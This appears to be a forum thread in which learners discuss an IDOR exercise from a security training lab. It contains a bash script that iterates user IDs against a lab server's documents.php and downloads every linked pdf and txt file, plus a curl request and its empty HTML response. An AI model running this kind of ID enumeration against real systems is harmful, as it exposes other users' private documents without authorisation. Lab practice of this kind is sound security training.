This IDOR vulnerability really pissed me off. I found where the flag is in Burp, but I can’t find it with the bash script. The bash script I finally prepared downloads pdf and txt. Of course to the txt file with the flag. Contains spoilers!!!
I am so glad I am not the only person who was wound up by this. I have an almost identical script and it just doesn’t seem to work.
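#!/bin/bash
# Request the document list for each uid and download every linked pdf/txt file.
url='http://94.237.56.124:34655'
for i in {1..20}; do
    response=$(curl -s "$url/documents.php" -d "uid=$i")
    links=$(echo "$response" | grep -oP "\/documents.*?\.(pdf|txt)")
    for link in $links; do
        # Double quotes so $url and $link expand; single quotes pass the literal text to wget.
        wget -q "$url$link"
    done
done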
Even if I do a curl command, they all return the same blank??
curl http://94.237.56.124:34655//documents.php?uid=18
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Employee Documents</title>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable = no">
<link rel="stylesheet" href="./style.css">
</head>
<body>
<header>
<h1>Employee Documents</h1>
</header>
<ul id="compositions-list" class="pure-tree main-tree">
<li>
<input type="checkbox" id="trigger-views" checked="checked">
<label for="trigger-views">Documents</label>
<ul class="pure-tree">
</ul>
</li>
</ul>
</body>
</html>